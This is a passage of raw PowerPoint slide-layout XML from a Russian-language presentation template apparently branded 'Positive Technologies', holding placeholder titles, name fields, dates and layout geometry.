          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9726981" y="2169764"/>
            <a:ext cx="2022107" cy="3785468"/>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3"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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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4" name="TextBox 13"/>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836072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Заголовок и пункты">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7" name="Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="1071836"/>
            <a:ext cx="9067258" cy="1476552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:defRPr sz="4400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>в две строки</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="3248964"/>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2" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830"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14" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7363368" y="3248964"/>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5" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7363367"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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="4852885"/>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8" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830"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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7363368" y="4852885"/>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21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7363367"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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21"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24" name="TextBox 23"/>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5" name="TextBox 24"/>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582180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Текст с примечаниями">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Прямоугольник 27"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4496499"/>
            <a:ext cx="12192000" cy="2361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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Рисунок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4" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="2273417"/>
            <a:ext cx="9067259" cy="1031845"/>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6" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358383"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7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680133" y="4769142"/>
            <a:ext cx="4387417"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9" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382333" y="4769142"/>
            <a:ext cx="4366756"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19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681831"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1" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680134"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2" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4249726"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3" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4248029"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4" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819333"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5" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817636"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6" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382332"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7" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380635"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0"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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="2169763"/>
            <a:ext cx="2022107" cy="486330"/>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4"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35" name="TextBox 34"/>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32" name="TextBox 31"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2777222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
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solid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DAF7B9FD-711C-4285-B2F6-2708424AB76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00"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Рисунок 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF95EE0C-2229-4561-B778-3EFAA9A912A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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CFB677EA-F93F-4CCA-801F-884D64C3B84C}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>20.06.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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40953653"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="68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2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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598449D6-BE1C-475E-B363-1990A0CE44FC}"/>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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CFB677EA-F93F-4CCA-801F-884D64C3B84C}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>20.06.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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457317916"/>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3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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97D9C085-80F0-4D08-B62B-793F6ABD8B2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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CFB677EA-F93F-4CCA-801F-884D64C3B84C}" type="datetime1">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>20.06.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333826" y="6172705"/>
            <a:ext cx="2355132" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>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94457152"/>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Обложка 3">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1444FE31-5399-4C4F-B22C-500FB872C6E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9064771-C72D-4166-955D-44D7161202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6642" t="32411"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4386801" y="0"/>
            <a:ext cx="7805198" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB7D6603-5FDC-4872-9FEC-8B5E8B7AF762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338035" y="2124831"/>
            <a:ext cx="5913664" cy="3841750"/>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9" name="Заголовок 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450C0215-BC11-413A-B3A0-DCA3F6BCB35C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Заголовок</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>в две строки</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D600CB3D-3332-4686-956C-3B7050E6998D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80883E4C-6F7F-4E67-A2DB-3250950E907F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Рисунок 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0EA3881-3E2B-49A7-AB08-03237B08EC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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329637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Обложка 4">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E69E785-AF58-489B-A163-117FC16A85E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Заголовок 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC30DAE9-F946-4DB4-9C12-948ECF5A2CFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338035" y="351064"/>
            <a:ext cx="5464629" cy="5598885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Рисунок 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9F0090-2EE5-43E0-A18A-CAB46F3BA18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7" name="Текст 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4924B48F-BE98-4A97-B53B-128B63519F21}"/>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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E2953F5-DAA6-4FEF-B2FA-1A2BBBA7401C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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84936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Обложка 5">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D9C9434-8532-4BFA-8E38-5E8A8382CB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7" name="Заголовок 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC2355D-62AC-4D0E-8C75-F127970ED60C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338035" y="351064"/>
            <a:ext cx="5464629" cy="5598885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1A4E91-733D-4867-82DE-BC0DAA2DFD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Текст 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F3AFA2-E965-49DD-AF0F-63547C5982F9}"/>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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0"/>
              <a:t>Имя Фамилия</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{175B2D60-B868-4596-B525-8D54E3939679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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29073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p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx2"/>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2671714" y="2647490"/>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6" name="Заголовок 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640265" y="898072"/>
            <a:ext cx="9220582"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
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Рисунок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TextBox 8"/>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10195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2">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217F614F-BD90-45E2-805B-9AEEDEA5859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a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Рисунок 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{673D4E3C-382C-480E-ABBB-5CA7FF95876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5747" y="1493446"/>
            <a:ext cx="10988350" cy="5224317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD4F864-0605-440B-8433-54828F58B1D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671714" y="2647490"/>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7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A0EB4C-5C63-43D0-9808-C015EFD60A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263D1433-85E0-46FB-8763-62E0FF041802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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1" name="Заголовок 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16859D7-35EA-4BA7-BB22-7BA87DE0802B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640265" y="898072"/>
            <a:ext cx="9220582"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361761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3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10"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3" name="Рисунок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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682939" y="2605532"/>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6" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="2111390"/>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7" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022914" y="2603263"/>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8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021805"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9" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7362889" y="2603263"/>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0" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361780"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1" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681830" y="4639195"/>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2" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680721" y="4145053"/>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3" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021805" y="463692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4" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020696"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5" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361780" y="463692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6" name="Текст 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7360671"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7" name="TextBox 26"/>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9" name="TextBox 28"/>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561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3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>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422010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4" y="441325"/>
            <a:ext cx="10824249" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
